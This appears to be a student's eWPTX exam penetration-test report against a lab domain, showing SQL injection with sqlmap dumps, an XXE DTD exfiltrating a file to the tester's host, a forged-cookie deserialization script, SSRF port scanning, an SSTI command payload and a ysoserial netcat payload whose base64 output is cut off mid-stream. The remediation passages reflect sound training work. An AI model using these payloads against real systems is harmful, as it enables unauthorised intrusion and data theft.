eWPTX Exam Report

Confidentiality Statement

This document is the sole property of Tera Host and TU EMPRESA. It contains sensitive and
proprietary information. Any duplication, redistribution, or utilization of this document, whether in
whole or in part, in any manner, necessitates the approval of both Tera Host and TU EMPRESA.
To demonstrate compliance with penetration test requirements, Tera Host may disclose this
document to auditors under non-disclosure agreements.

Disclaimer

A penetration test represents a specific point in time. The conclusions and suggestions stem from
the data collected during the evaluation and do not account for alterations or adjustments made
outside of that timeframe. Time-constrained engagements do not permit a comprehensive review
of all security measures. TU EMPRESA focused the assessment on detecting the most vulnerable
security controls that an attacker could exploit. To maintain the effectiveness of these controls, TU
EMPRESA advises conducting similar evaluations on an annual basis, either internally or through
third-party assessors.

Assessment Overview

Tera Host collaborated with TU EMPRESA to analyze its infrastructure's security stance against
current industry best practices, encompassing a web application penetration test. The testing
conducted is based on the NIST SP 800-115 Technical Guide to Information Security Testing and
Assessment, OWASP Testing Guide (v4), and tailored testing frameworks.

The penetration testing process consists of the following stages:

1. Planning – Collect customer objectives and establish rules of engagement.

2. Discovery – Conduct scanning and enumeration to pinpoint potential vulnerabilities, weak

spots, and exploitable areas.

3. Attack – Validate potential vulnerabilities through exploitation and carry out further discovery
with new access.

4. Reporting – Document all identified vulnerabilities and exploits, unsuccessful attempts, and
the organization's strengths and weaknesses.

eWPTX Exam Report 1

 Assessment Components

Web Application Penetration Test

To determine the security of a system, web application penetration testing simulates attacks on
the system with the goal of obtaining sensitive information. These attacks can be executed either
internally or externally and help gather data about the target system while revealing its
vulnerabilities and possible exploits. This essential system health check informs testers if security
measures and corrective actions need to be implemented.

I will keep in mind I can’t do the following on my targets :

-Denial of Service (DoS)

-Phishing/Social Engineering

All other attacks not specified above were permitted by Tera Host.

Scope :

10.100.13.37
10.100.13.33
10.100.13.34

All of this are for terahost.com domain .

To connect to the target organization website and also resolve domain names, I have to add
the server IP address 10.100.13.37 into your DNS configuration in the same way I did with the
course laboratories, and add an entry into the /etc/resolv.conf file with the IP address of the
server

Now, the scope is :

1. 10.100.13.37 = http://www.terahost.exam

2. 10.100.13.33 = http://me.terahost.exam/

3. 10.100.13.34 = http://blog.terahost.exam/ alias “FOOCORP BLOG”

eWPTX Exam Report 2

 I will add this on the /etc/hosts :

eWPTX Exam Report 3

 Also I will restart the network services to be sure everything goes as planned

eWPTX Exam Report 4

 Starting with the Pentesting on the 3 targets I got :

www.terahost.exam

First of all, installing plugin FoxyProxy on Kali’s Firefox :

Configuring the Add-on so it connects to Burpsuite

And in Foxyproxy I do :

eWPTX Exam Report 5

 Now everytime I check Burpsuite in the addon, traffic will be redirected to my Burpsuite

Also I will install certificate of Burpsuite (CA) by going to http://burpsuite , download and install it .

eWPTX Exam Report 6

 I will use Burp’s browser from now on , so I need to check the “Run Burp’s browser without a
sandbox” :

Now I am good to go and check the website more .

After navigating on it, I will get the HTTP History and see more about the target :

eWPTX Exam Report 7

 After doing some more checks , my attention went to this newsletter subscription :

I have sent this page to repeater and try to see if it’s single quotes or double quotes error present :

Single quote (got me an error) :

eWPTX Exam Report 8

 Double quotes, not :

So definetly it’s an SQL injection here , and the single quote is the trigger .

Using https://portswigger.net/web-security/sql-injection and the cheatsheet from there, I got the

injection
After using some from the cheatsheet on that third party website, I managed to see that I am able
to execute SQL queeries that spits out the correct information about the SQL database :

eWPTX Exam Report 9

 In the above I asked about the version using the following payload :
test’,version())# in the username field.

Searching for more , I have found that when I search for domain can be injected too .
Checking HTTP History on Burpsuite:

In Burpsuite I got :

eWPTX Exam Report 10

 I will save the request in a file called tera.sql , here is the content :

POST /check HTTP/1.1

Host: www.terahost.exam
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: http://www.terahost.exam
Connection: close
Referer: http://www.terahost.exam/

domain=*.test

eWPTX Exam Report 11

 Now after using sqlmap with the tera.sql file , I realised it has vulnerabilities too doing this
command, and found it’s a time-based blind SQL

sqlmap -r tera.sql

I will explain like explained in the portswigger website what happens here:
SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the
queries that an application makes to its database. It generally allows an attacker to view data that

eWPTX Exam Report 12

 they are not normally able to retrieve. This might include data belonging to other users, or any
other data that the application itself is able to access. In many cases, an attacker can modify or
delete this data, causing persistent changes to the application's content or behavior.

In some situations, an attacker can escalate a SQL injection attack to compromise the underlying
server or other back-end infrastructure, or perform a denial-of-service attack.

What is the impact of a successful SQL injection attack?

A successful SQL injection attack can result in unauthorized access to sensitive data, such as
passwords, credit card details, or personal user information. Many high-profile data breaches in
recent years have been the result of SQL injection attacks, leading to
reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent
backdoor into an organization's systems, leading to a long-term compromise that can go
unnoticed for an extended period.

How to prevent SQL injection

Most instances of SQL injection can be prevented by using parameterized queries (also known as
prepared statements) instead of string concatenation within the query.
Parameterized queries can be used for any situation where untrusted input appears as data within
the query, including the WHERE clause and values in an INSERT or UPDATE
statement. They can't be used to handle untrusted input in other parts of the query, such as table
or column names, or the ORDER BY clause. Application functionality that places untrusted data into
those parts of the query will need to take a different approach, such as
white-listing permitted input values, or using different logic to deliver the required behavior.

For a parameterized query to be effective in preventing SQL injection, the string that is used in the
query must always be a hard-coded constant, and must never contain any variable data from any
origin. Do not be tempted to decide case-by-case whether an item of data is trusted, and continue
using string concatenation within the query for cases that are considered safe. It is all too easy to
make mistakes about the possible origin of data, or for changes in other code to violate
assumptions about what data is tainted.

me.terahost.exam

After going straight to http://10.100.13.37 , it landed me on a login page, also I clicked Register to
register an account ( all this is done in Burpsuite browser) :

eWPTX Exam Report 13

 User exam on all the fields and as password I used test then clicked Register.

After doing that redirected me to Login page .

Using the creds I registered, just tells me welcome back exam , and exits and gives me back on
login page and asks me again to log in.
Couldn’t catch a screenshot, cause refresh rate is too fast for me to do a screenshot

But as always, I can check HTTP History in Burp :

eWPTX Exam Report 14

 The above shows the message I couldn’t catch fast with the screenshot .

After checking more, I saw this :

Assuming my first approach of SQL injection from terahost.exam target I did earlier, it’s single
quote here, so let’s try on the name again with the single quote and see what I can get.
First I send this to repeater and then do again the test to see if it’s vulnerable :

eWPTX Exam Report 15

 And it seems it is :

So payload here is on name=exam’

Also notice in the above screenshot that the password I used test is changed in MD5 , which is a
weak approach from the ones who created this register page for terahost.exam
test in MD5 = 098f6bcd4621d373cade4e832627b4f6
Now I will try to inject and see if I can get once again the version running, by injecting in the
surename :

eWPTX Exam Report 16

 In the webpage profile after login, I can see the following result :

Searching for more , it appears that I have discovered a potential SQL injection vulnerability while
testing the "update user" functionality. By inserting a single quote (') into each field and observing
a SQL error in the Repeater response after filling the city field with a single quote, it indicates that
the application may not be properly sanitizing user inputs.
So injection could be done this way too.
Now checking the Profile page after logging in, I played in Burp and noticed that adding single
quote to “city” field near Berlin (this was added by the app itself) , I got the following error in the
repeater :

eWPTX Exam Report 17

 It can be seen that after updating the user, using that one I got an error again. And errors are good
in SQL , helps identify potential breaches!
Knowing this, I will create an SQLi command once again and test to see if I can find it’s vulnerable
:

sqlmap --csrf-url=http://me.terahost.exam/profile --csrf-token="acdt67gshfuiuasfsg" -u http://me.ter

ahost.exam/update-user -data="name=exam&surname=exam&email=exam%40exam.com&street_address=8850+Egest
as+Ave&city=Berlin&zip=29977-647&iban=GT33211377800379210569053628&password=&uID=500&acdt67gshfuiuas
fsg=ef0d17b3bdb4ee2aa741ba28" -p 'city' --cookie="_sid_=bv6ppamplr520ek47a03dk00u7; displayoptions=
1" --random-agent --current-db --users --is-dba --privileges

Seems good so far, now trying to dump the users :

sqlmap --csrf-url=http://me.terahost.exam/profile --csrf-token="acdt67gshfuiuasfsg" -u http://me.ter

ahost.exam/update-user -data="name=exam&surname=exam&email=exam%40exam.com&street_address=8850+Egest
as+Ave&city=Berlin&zip=29977-647&iban=GT33211377800379210569053628&password=&uID=500&acdt67gshfuiuas
fsg=ef0d17b3bdb4ee2aa741ba28" -p 'city' --cookie="_sid_=bv6ppamplr520ek47a03dk00u7; displayoptions=
1" --random-agent --current-db --users --dump

eWPTX Exam Report 18

 The dump for users was huge, but I proved it works , so all good.

Once again for patching I will say what I have read from https://portswigger.com website :
Most instances of SQL injection can be prevented by using parameterized queries (also
known as prepared statements) instead of string concatenation within the query.
Parameterized queries can be used for any situation where untrusted input appears as data
within the query, including the WHERE clause and values in an INSERT or UPDATE statement.
They can't be used to handle untrusted input in other parts of the query, such as table or
column names, or the ORDER BY clause. Application functionality that places untrusted data
into those parts of the query will need to take a different approach, such as white-listing
permitted input values, or using different logic to deliver the required behavior.
For a parameterized query to be effective in preventing SQL injection, the string that is used
in the query must always be a hard-coded constant, and must never contain any variable data
from any origin. Do not be tempted to decide case-by-case whether an item of data is
trusted, and continue using string concatenation within the query for cases that are
considered safe. It is all too easy to make mistakes about the possible origin of data, or for
changes in other code to violate assumptions about what data is tainted.

eWPTX Exam Report 19

 Now let’s look deeper .

I used dirb and checked for more undisclosed paths:

dirb http://me.terahost.exam/

eWPTX Exam Report 20

 This showed me http://me.terahost.exam/support page . I put a message there test

and sent it .

Checking more in HTTP History , sending to repeater.

I crafted myself a dtd page to fetch it from my kali VM and I called it data.dtd .
It has the following content:

eWPTX Exam Report 21

 <!ENTITY % out SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/me.terahost.
exam/info.php">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://10.100.13.200:1234/x=?%out;'> ">

Now hosting the file with Python server :

python3 -m http.server 80

Now I edit the request to get the data.dtd file from my Kali VM machine and then to
execute it and saw all went good!

Watching again the video from INE training about XXE .

Downloading the XXESERVE :

git clone https://github.com/joernchen/xxeserve.git

Configuring the xxeserve.rb file with my server:

Giving rights on xxeserve.rb

eWPTX Exam Report 22

 chmod +x xxeserve.rb

gem install sinatra

Had to install it so it can work

Started the xxeserve.rb

./xxeserve 80

Now I will create as in video but with slightly modification evil.dtd and host it with apache2 on
/var/www/html
Also tested to see if it’s hosted, here is the content too:

Hosting with Python3 http server

python3 -m http.server 80

Got the string encoded in base64

PD9waHAgJF9bXSsrOyRfW109JF8uXzskX19fX189JF9bKCsrJF9fW10pXVsoKyskX19bXSkrKCsrJF9fW10pKygrKyRfX1tdKV07
JF89JF9bJF9bK19dXTskX19fPSRfXz0kX1srKyRfX1tdXTskX19fXz0kXz0kX1srX107JF8rKzskXysrOyRfKys7JF89JF9fX18u
KyskX19fLiRfX18uKyskXy4kX18uKyskX19fOyRfXz0kXzskXz0kX19fX187JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7
JF8rKzskXysrOyRfKys7JF8rKzskX19fPStfOyRfX18uPSRfXzskX19fPSsrJF9eJF9fX1srX107JMOAPStfOyTDgT0kw4I9JMOD
PSTDhD0kw4Y9JMOIPSTDiT0kw4o9JMOLPSsrJMOBW107JMOCKys7JMODKys7JMODKys7JMOEKys7JMOEKys7JMOEKys7JMOGKys7
JMOGKys7JMOGKys7JMOGKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJ
Kys7JMOJKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7
JMOLKys7JMOLKys7JMOLKys7JF9fKCckXz0iJy4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDhC4kw4MuJF9fXy4kw4EuJMOG
LiTDgC4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOELiTDgC4kX19fLiTDhC4kw4IuJF9fXy4kw4EuJMOBLiTDgC4kX19fLiTDgS4k
w4QuJMOGLiRfX18uJMOBLiTDhi4kw4QuJF9fXy4kw4EuJMOGLiTDhC4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOELiTDgC4kX19f
LiTDgS4kw4guJMOELiRfX18uJMOBLiTDhi4kw4AuJF9fXy4kw4EuJMOELiTDhi4kX19fLiTDgS4kw4guJMOCLiRfX18uJMOBLiTD
hC4kw4YuJF9fXy4kw4YuJMOELiRfX18uJMOELiTDgC4kX19fLiTDgS4kw4EuJMOBLiRfX18uJMOELiTDgC4kX19fLiTDgS4kw4Qu
JMODLiRfX18uJMOBLiTDhC4kw4EuJF9fXy4kw4EuJMOGLiTDiC4kX19fLiTDhC4kw4AuJF9fXy4kw4EuJMOILiTDgi4kX19fLiTD
gS4kw4QuJMOGLiRfX18uJMOBLiTDhC4kw4EuJF9fXy4kw4EuJMOELiTDhC4kX19fLiTDhC4kw4AuJF9fXy4kw4EuJMOCLiTDgC4k
X19fLiTDgS4kw4EuJMOALiRfX18uJMOBLiTDgi4kw4AuJF9fXy4kw4QuJMOALiRfX18uJMOBLiTDhC4kw4YuJF9fXy4kw4EuJMOI
LiTDiC4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDhi4kw4guJF9fXy4kw4QuJMOALiRfX18uJMOBLiTDhC4kw4YuJF9fXy4k
w4EuJMOGLiTDiC4kX19fLiTDgS4kw4QuJMODLiRfX18uJMOBLiTDhi4kw4kuJF9fXy4kw4EuJMOELiTDhC4kX19fLiTDgS4kw4Qu
JMOGLiRfX18uJMOBLiTDhC4kw4QuJF9fXy4kw4YuJMOELiRfX18uJMOELiTDgC4kX19fLiTDgS4kw4EuJMOBLiRfX18uJMOELiTD
gC4kX19fLiTDgS4kw4QuJMODLiRfX18uJMOBLiTDhC4kw4EuJF9fXy4kw4EuJMOGLiTDiC4kX19fLiTDhC4kw4AuJF9fXy4kw4Eu
JMOILiTDgC4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDiC4kw4MuJF9fXy4kw4EuJMOILiTDgy4kX19fLiTDhC4kw4AuJF9f
Xy4kw4EuJMOILiTDhC4kX19fLiTDgS4kw4YuJMOALiRfX18uJMOBLiTDhC4kw4YuJF9fXy4kw4QuJMOALiRfX18uJMOBLiTDhC4k
w4YuJF9fXy4kw4EuJMOJLiTDgC4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDhi4kw4YuJF9fXy4kw4QuJMOBLiRfX18uJMOE
LiTDgi4kX19fLiTDiS4kw4MuJyInKTskX18oJF8pOz8+Cg==

eWPTX Exam Report 23

 I see it’s a php obfuscated , so managed to get it finally .

Going to 3v4l.org , seleceting all the PHP versions and decoding I got the flag :

Full link → https://3v4l.org/CDeJE#v7.0.33

eWPTX Exam Report 24

 echo "Hello there, I can read PHP even encoded, I can pass the exam!"; in /in/CDeJE on line 1
Just zoom in the picture, and it will show the above flag!

That’s the found XXE vulnerability on me.terahost.exam/support

According to https://portswigger.net/web-security/xxe , XXE injection is a serious vulnerability that

allows attackers to access files and directories outside the XML document. With arbitrary access
to the file system, an attacker can access configuration data, passwords, log files, source code,
intellectual property, or system files. Besides the
disclosure of sensitive data, this attack may lead to a denial of service, enable malicious code
execution, or allow the attacker to conduct a port scan from the perspective of the machine where
the parser is located.
XML external entity injection (also known as XXE) is a web security vulnerability that allows an
attacker to interfere with an application's processing of XML data. It often allows an attacker to
view files on the application server file system, and to interact with any back-end or external
systems that the application itself can access. In some situations, an attacker can escalate an
XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging
the XXE vulnerability to perform server-side request forgery
(SSRF) attacks.

blog.terahost.exam
Point of reference here is the same website portswigger , here is full link :
https://portswigger.net/web-security/deserialization

Insecure deserialization is when user-controllable data is deserialized by a website. This

potentially enables an attacker to manipulate serialized objects in order to pass harmful data into
the application code.
It is even possible to replace a serialized object with an object of an entirely different class.
Alarmingly, objects of any class that is available to the website will be deserialized and
instantiated, regardless of which class was expected. For this reason, insecure deserialization is

eWPTX Exam Report 25

 sometimes
known as an "object injection" vulnerability.
An object of an unexpected class might cause an exception. By this time, however, the damage
may already be done. Many deserialization-based attacks are completed before deserialization is
finished. This means that the deserialization process itself can initiate an attack, even if the
website's own functionality does not directly interact with the malicious object. For this reason,
websites whose logic is based on strongly typed

The impact of insecure deserialization can be very severe because it provides an entry point to a
massively increased attack surface. It allows an attacker to reuse existing application code in
harmful ways, resulting in numerous other vulnerabilities, often remote code execution.

Even in cases where remote code execution is not possible, insecure deserialization can lead to
privilege escalation, arbitrary file access, and denial-of-service attacks.

Used feroxbuster

feroxbuster --url http://blog.terahost.exam/

eWPTX Exam Report 26

 Used dirsearch too on this one

dirsearch --url http://blog.terahost.exam/

Found a login.php page

eWPTX Exam Report 27

 From the dirsearch also found on GIT logs on testtest1234567890 this

I will take note about this stuff for later.

Another interesting finding is

This seems promising.

Using https://lelinhtinh.github.io/de4js/ and put the content of the blog.js and clicked Auto Decode

eWPTX Exam Report 28

 Got this output!

var http = new XMLHttpRequest,

url = '[',
params = String['"'](117, 115, 101, 114, 110, 97, 109, 101),
p1 = String['"'](61, 102, 111, 111, 98, 108, 111),
pp11 = String['"'](103, 38, 112, 97, 115),
p11 = String['"'](103, 38, 112, 97, 115),
p2 = String['"'](115, 119, 111, 114, 100, 61, 102, 111),
p111 = String['"'](103, 38, 112, 97, 115),
p22 = String['"'](111, 48, 98, 108, 111, 103, 49),
x = '\\';
xx = params.x(p1), xxx = xx.x(p11), yyy = yyy.x(xxx), xxxx = xxx.x(p2), yy = xxxx.x(p22), http.F
('3', url, !0), http['7']('\\', 'x'), alert(yyy), http['0'] = function () {
4 == http['\\'] && 200 == http.x && alert(http['6']), console['1'](p2)
}, http['\\'](yy)

Nothing yet, trying another website I found by googling https://mindedsecurity.github.io/jstillery/

Found creds!

Line 33 →

eWPTX Exam Report 29

 http.send('username=fooblog&password=foo0blog1');

Username : fooblog
Password : foo0blog1

All content debofuscated :

var _0x4777 = [
'?page=login',
'fromCharCode',
'',
'concat',
'POST',
'open',
'Content-type',
'application/x-www-form-urlencoded',
'setRequestHeader',
'onreadystatechange',
'readyState',
'status',
'responseText',
'log',
'send'
];
var http = new XMLHttpRequest(), url = '?page=login', params = 'username', p1 = '=fooblo', pp11 = 'g
&pas', p11 = 'g&pas', p2 = 'sword=fo', p111 = 'g&pas', p22 = 'o0blog1', x = '';
xx = 'username=fooblo';
xxx = 'username=fooblog&pas';
yyy = yyy.concat('username=fooblog&pas');
xxxx = 'username=fooblog&password=fo';
yy = 'username=fooblog&password=foo0blog1';
http.open('POST', '?page=login', true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
alert(yyy.concat('username=fooblog&pas'));
http.onreadystatechange = function ()
/* Called:undefined | Scope Closed:false| writes:false*/
{
4 == http.readyState && 200 == http.status && alert(http.responseText);
console.log(p2);
};
http.send('username=fooblog&password=foo0blog1');

Succesfully logged in to blog

eWPTX Exam Report 30

 From GIT logs that I’ve shown above , I have found testtest1234567890 , trying it with the blog,
got something new!

Link : http://blog.terahost.exam/testtest1234567890/

eWPTX Exam Report 31

 Checking more the content of the files:

cryp.php.inc :

<?

$plaintext = "abcdef";
$key = "8b362e210615e66b3bf7f69f6c819056";
$cipher = "aes-256-ctr";
$iv = "ABCDEFGHIJKLMNOP";

function encrypt($plaintext) {
if (in_array($cipher, openssl_get_cipher_methods()))
{
$ivlen = openssl_cipher_iv_length($cipher);
echo '\n'.strlen($iv).'\n';
$ciphertext = openssl_encrypt($plaintext, $cipher, $key, $options=0, $iv);
if ($ciphertext) {
return $ciphertext;
} else {
echo "Encryption error";
}

eWPTX Exam Report 32

 userdata.php.inc :

<?php

class userdata {
public $role = "";
public $id = 0; //0-99
public $uid = 0; //0-99

}
?>

I had to do CTRL+U to see these coding of each of the 2 pages.

I see in the last one that I can assign roles , so I will try to see if I can do PE on target.
I will assign the role of Administrator

So I will create a new php page with the following content and call it admin.php :

<?php

class userdata {
public $role = "admin";
public $id = 0;
public $uid = 0;

public function __construct($i, $u) {

$this->id = (int)$i;
$this->uid = (int)$u;
}
}

$key = '8b362e210615e66b3bf7f69f6c819056';

for ($i = 0; $i < 100; $i++) {

for ($x = 0; $x < 101; $x++) {
$injected_class = new userdata($i, $x);
$serialized_class = serialize($injected_class);

$chiper = 'aes-256-ctr';
$iv = "ABCDEFGHIJKLMNOP";

$encrypted_data = openssl_encrypt($serialized_class, $chiper, $key, 0, $iv);

$cookie_value = base64_encode($encrypted_data);
echo("$cookie_value\n");

eWPTX Exam Report 33

 }
}
?>

This admin.php creates a userdata class with public properties role , id , and uid . The
constructor of the class takes two parameters, $i and $u , and assigns their integer values to the
properties id and uid , respectively.

The script then uses two nested for loops to iterate through all combinations of $i and $x from
0 to 99 and 0 to 100, respectively. For each combination, it creates an instance of the userdata

class, serializes it, and then encrypts the serialized data using the openssl_encrypt() function. The
encrypted data is then base64-encoded and printed out.

After this on my own Kali VM , I will execute the admin.php

script using the PHP command-line interface (CLI), and then redirect the output to a file called
admin.txt

The php CLI and output the admin.txt :

eWPTX Exam Report 34

 I installed Cookie Editor Add-On on my Firefox

Now I will use the admin.txt file with Burpsuite and try the values I got in the admin.txt with Intruder
, and look for a good result (the most length I get, then change the value for the auth using the
Cookie Editor Add-On)

First in the Chrome browser from Burp , I log in to the blog then I send in the Intruder the request
and use the admin.txt

eWPTX Exam Report 35

 Now adding the list I just created previously to do the bruteforce attack

After starting the attack I got the role of admin in the response :

eWPTX Exam Report 36

 False alarm , seems the account is locked, so I need to wait a lot to finish the Intruder task with
10100 tries

Finally got a big length response:

Trying to edit the cookie and checking in the browser of Firerfox

Ti8ra1RvUVBHd25HV3hydGFpZW1OQlExeFo0dW5zNnlVa1dSV244NmI4K1J1ZThkdmZHaUVWNy9ENnZHYzlFelpQMlpRUjRBSDFD
amRyVXMwWS95Sm9mWk9RNmdKTE09

That is the cookie that works and makes me Administrator on the blog!

Perfect until here.

GET /index.php?page=profile HTTP/1.1

Host: blog.terahost.exam
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/
104.0.5112.102 Safari/537.36

eWPTX Exam Report 37

 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q
=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://blog.terahost.exam/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=fimsllqs80e7fqrqph976et5h1; auth=Ti8ra1RvUVBHd25HV3hydGFpZW1OQlExeFo0dW5zNnlVa1dSV
244NmI4K1J1ZThkdmZHaUVWNy9ENnZHYzlFelpQMlpRUjRBSDFDamRyVXMwWS95Sm9mWk9RNmdKTE09
Connection: close

In general, it's best to avoid deserializing user input unless it's absolutely necessary, as the risks
associated with potential exploits and the challenges in defending against them often outweigh the
benefits. If you must deserialize data from untrusted sources, implement strong safeguards to
ensure data integrity, such as using a digital signature. Keep in mind that these checks should be
performed prior to starting the deserialization process; otherwise, they may not be effective.

If possible, steer clear of generic deserialization functions. These methods expose all attributes of
the original object, including private fields that may contain sensitive data. Instead, consider
developing custom, class-specific serialization methods that grant you control over which fields
are revealed.
Lastly, it's crucial to understand that the vulnerability lies in the deserialization of user input, not in
the gadget chains handling the data afterward. Don't depend on eliminating gadget chains
discovered during testing, as it's nearly impossible to address all of them due to the
interconnected web of cross-library dependencies present on your website. Furthermore, publicly
documented memory corruption exploits can pose a threat at any time, potentially leaving your
application vulnerable.

After getting the Administrator rights, looking more in the code of the page, i see this :

eWPTX Exam Report 38

 src="9c717baeeca3a2c67f2c7797c96292ca/fetch.php"

So , on the profile page, Administrator can import articles , etc. I will check more .

Opened the request in burpsuite browser

Confirm that I am admin and going to the fetch.php that I have found earlier.

eWPTX Exam Report 39

 Checked the Import

Intercepted response in Burpsuite :

I noticed URL , so I will put 127.0.0.1 and check it.

Also I will try with Intruder to see if I can find any open ports maybe I can get lucky

eWPTX Exam Report 40

 Added to check from 1 - 5100 , step by step each number as payload , and started the attack

I have found some nice lengths that indicated 3 opened ports : 80, 631 and 5000 .

When feasible, refrain from utilizing user-generated input in functions that can execute requests
on the server's behalf. If it is necessary to incorporate user-generated data into a URL, restrict the
web server's resource requests by employing a whitelist of approved domains and protocols. Due
to the multitude of potential attacker-initiated requests, blacklists should be avoided. Moreover,
disable unneeded URL schemes like file:///, ftp://, or gopher://, and ensure that authentication is
mandated for internal services such as Elasticsearch and MongoDB.

This was a SSRF attack .

As shown on portswigger website:

Server-Side Request Forgery (SSRF) is a web security flaw that enables an attacker to
manipulate a server-side application into making requests to unintended destinations. Typically, in
an SSRF attack, the perpetrator might compel the server to connect to internal-only services
within the organization's infrastructure. Alternatively, they could force the server to establish

eWPTX Exam Report 41

 connections with arbitrary external systems, potentially exposing sensitive information like
authorization credentials.
A successful SSRF assault can frequently lead to unauthorized actions or data access within the
organization, either in the compromised application itself or in other backend systems with which
the application communicates. In certain cases, an SSRF vulnerability might allow the attacker to
execute arbitrary commands. An SSRF exploit that triggers connections to external third-party
systems could result in malicious follow-up attacks that seemingly stem from the organization
hosting the vulnerable application.

Checking if I can ping my IP using Burp and that url parameter (opening netcat listener) :

Seems I can hit my listener! That’s good.

Also found on port 5000 request that it asks for name :

Checking for Twig SSTI , reference link I followed up is https://book.hacktricks.xyz/pentesting-

web/ssti-server-side-template-injection

Seems good again, checking to catch the first reverse shell now!

eWPTX Exam Report 42

 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template
Injection/README.md I will check payloads from here and one of them gave me ‘ls’ on the
response succesfully :

config.__class__.__init__.__globals__['os'].popen('ls').read()

The given Python code snippet is an example of how to execute a shell command (in this case,
'ls') using the 'os' module in Python. The code retrieves the global 'os' object from the
configuration class's __init__ method and calls its 'popen' function to run the 'ls' command. The
output is then read and returned.

I will check this out further doing more tests , cooling the heat in my head. This is crazy
Moving further I will the 1337 port and see what I get

So, sending to repeater and let’s play around with it:

We can notice that the application necessitates a parameter called "data." However, when
attempting to upload something, the application indicates that base64 encoding must be employed
while in Java mode.

I can use like in training material ysoserial and generate a payload which I can add it and get my
first reverse shell .

Let’s see how it goes .

Downloaded from https://github.com/frohoff/ysoserial/releases/tag/v0.0.6 the ysoserial.jar file first.

Running it shows this (how to use it) :

eWPTX Exam Report 43

 Now I will create my payload :

java -jar ysoserial-all.jar CommonsBeanutils1 "nc 10.100.13.200 1324" | base64 | tr -d '\n' > payloa
d.txt

An error occurred during the generation or serialization of the payload:

java.lang.IllegalAccessError: The class ysoserial.payloads.util.Gadgets (in an unnamed module

@0x4015e7ec) is unable to access the class
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in the java.xml module) because the
java.xml module does not export com.sun.org.apache.xalan.internal.xsltc.trax to the unnamed
module @0x4015e7ec.
The error occurred at:

ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)

ysoserial.payloads.CommonsBeanutils1.getObject(CommonsBeanutils1.java:20)

ysoserial.GeneratePayload.main(GeneratePayload.java:34)

Hm … I will do some debug, and it will take me some time now ..

http://www.jrasp.com/case/CVE-2021-26295.html checking this I saw something new.

Let’s see..
Found it https://forum.portswigger.net/thread/ysoserial-stopped-working-b5a161f42f

eWPTX Exam Report 44

 Got it, had to uninstall and reinstall Java JDK11 so ysoserial can work ..

java -jar ysoserial-all.jar CommonsBeanutils1 "nc 10.100.13.200 1234" | base64 | tr -d '\n' > payloa
d.txt

This is the payload :

rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGls
L0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIA
AkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25z
LmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRp
ZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8Fu
rKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2
YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAA
AAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABqfK/rq+AAAAMgA5CgADACIHADcHACUH
ACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAP
TGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNs
YXNzZXMBADVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEA
